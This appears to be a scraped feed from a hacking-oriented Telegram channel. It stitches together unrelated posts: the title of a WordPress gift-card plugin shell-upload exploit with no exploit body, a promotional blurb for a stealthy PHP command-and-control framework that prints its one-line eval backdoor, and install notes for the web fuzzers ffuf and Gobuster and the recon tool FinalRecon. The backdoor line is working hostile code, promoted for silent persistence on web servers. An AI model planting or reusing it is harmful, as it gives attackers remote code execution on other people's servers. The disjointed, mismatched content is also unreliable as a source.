WordPress_Yith_WooCommerce_Gift_Cards_Premium_3_19_0_Shell_Upload.txt
4.2 KB
WordPress Yith WooCommerce Gift Cards Premium 3.19.0 Shell Upload Vulnerability
#CVE #Web_Applications #Php
Full-featured C2 framework which silently persists on
webserver via polymorphic PHP oneliner
Overview
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
Features
Efficient: More than 20 plugins to automate privilege-escalation tasks
Stealth: The framework is made by paranoids, for paranoids
Convenient: A robust interface with many crucial features
Supported platforms (as attacker):
GNU/Linux
Mac OS X
Supported platforms (as target):
GNU/Linux
BSD-like
Mac OS X
Windows NT
GitHub
#RedTeam #Web_Hacking #HackTool
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/MRvirusIRBOT
📢 t.iss.one/BugCod3
ffuf - Fuzz Faster U Fool
A fast web fuzzer written in Go.
Installation
Download a prebuilt binary from releases page, unpack and run!
or
If you are on macOS with homebrew, ffuf can be installed with:
brew install ffuf
or
If you have recent go compiler installed:
go install github.com/ffuf/ffuf/v2@latest
(the same command works for updating)
or
git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go build
Ffuf depends on Go 1.16 or greater.
GitHub
#Web #InfoSec #Fuzzer
Gobuster
Gobuster is a tool used to brute-force:
⚪️ URIs (directories and files) in web sites.
⚪️ DNS subdomains (with wildcard support).
⚪️ Virtual Host names on target web servers.
⚪️ Open Amazon S3 buckets
⚪️ Open Google Cloud buckets
⚪️ TFTP servers
GitHub
⬇️ Download
🔒
#Go #Dns #Web #Pentesting #Tools
FinalRecon is an automatic web reconnaissance tool written in Python. The goal of FinalRecon is to provide an overview of the target in a short amount of time while maintaining the accuracy of results. Instead of executing several tools one after another, it can provide similar results while keeping dependencies small and simple.
FinalRecon provides detailed information such as:
⚪️ Header Information
⚪️ Whois
⚪️ SSL Certificate Information
⚪️ Crawler
...
⚪️ DNS Enumeration
...
⚪️ Subdomain Enumeration
...
⚪️ Directory Searching
...
⚪️ Wayback Machine
...
⚪️ Port Scan
...
⚪️ Export
...
GitHub
#pentesting #web #Tools